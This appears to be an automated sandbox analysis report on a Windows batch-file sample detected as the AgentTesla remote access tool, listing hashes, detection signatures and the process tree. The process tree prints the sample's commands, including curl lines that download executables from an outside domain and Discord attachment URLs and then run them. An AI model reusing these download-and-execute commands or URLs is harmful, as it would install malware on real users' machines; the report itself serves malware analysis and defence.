Analysis
-
max time kernel
5s -
max time network
15s -
platform
windows11-21h2_x64 -
resource
win11-20231128-en -
resource tags
arch:x64arch:x86image:win11-20231128-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-12-2023 20:26
Static task
static1
Behavioral task
behavioral1
Sample
#πΎπ βπππΌβπ ππ.π.bat
Resource
win11-20231128-en
General
-
Target
#πΎπ βπππΌβπ ππ.π.bat
-
Size
20KB
-
MD5
a7793c10f4e024c789964be67375ab2a
-
SHA1
988d0af9a4ca435dd084ce541a250f6ba57f590a
-
SHA256
770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
-
SHA512
50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
-
SSDEEP
384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2980-12-0x0000028B506F0000-0x0000028B50906000-memory.dmp family_agenttesla -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
GV-Loader.exepid process 2980 GV-Loader.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4500 notepad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid process target process PID 776 wrote to memory of 4116 776 cmd.exe cacls.exe PID 776 wrote to memory of 4116 776 cmd.exe cacls.exe PID 776 wrote to memory of 4700 776 cmd.exe curl.exe PID 776 wrote to memory of 4700 776 cmd.exe curl.exe PID 776 wrote to memory of 1752 776 cmd.exe curl.exe PID 776 wrote to memory of 1752 776 cmd.exe curl.exe PID 776 wrote to memory of 4844 776 cmd.exe curl.exe PID 776 wrote to memory of 4844 776 cmd.exe curl.exe PID 776 wrote to memory of 4500 776 cmd.exe notepad.exe PID 776 wrote to memory of 4500 776 cmd.exe notepad.exe PID 776 wrote to memory of 2980 776 cmd.exe GV-Loader.exe PID 776 wrote to memory of 2980 776 cmd.exe GV-Loader.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#πΎπ βπππΌβπ ππ.π.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:4116
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe2⤵PID:4700
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt2⤵PID:1752
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe2⤵PID:4844
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4500 -
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exeC:\Users\Admin\AppData\Local\Temp\GV-Loader.exe2⤵
- Executes dropped EXE
PID:2980
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
555B
MD51c01acde55c409853a8bb588c523e810
SHA1f4be783a9aaec4a89e3631b4e843fcc7d44bfdda
SHA256a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872
SHA512700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372
-
Filesize
227B
MD525421ac6c89c87e6b09f2ca856a6c9d3
SHA12256c3f1078b0772e8e5aa09b6b97788c906da41
SHA25605e5eada548b1af4ef497f1f77f2fcaac19a4349aeab85882009db5552345876
SHA512ccf7aa0ad47ee19fa0dcc7a7d2493be8dde47b9af41bb6486c23d2c7fbaf6299971d6df7fc96282cbccbe711c77f7305bc37446be386938108b1e96e0cc2cbc5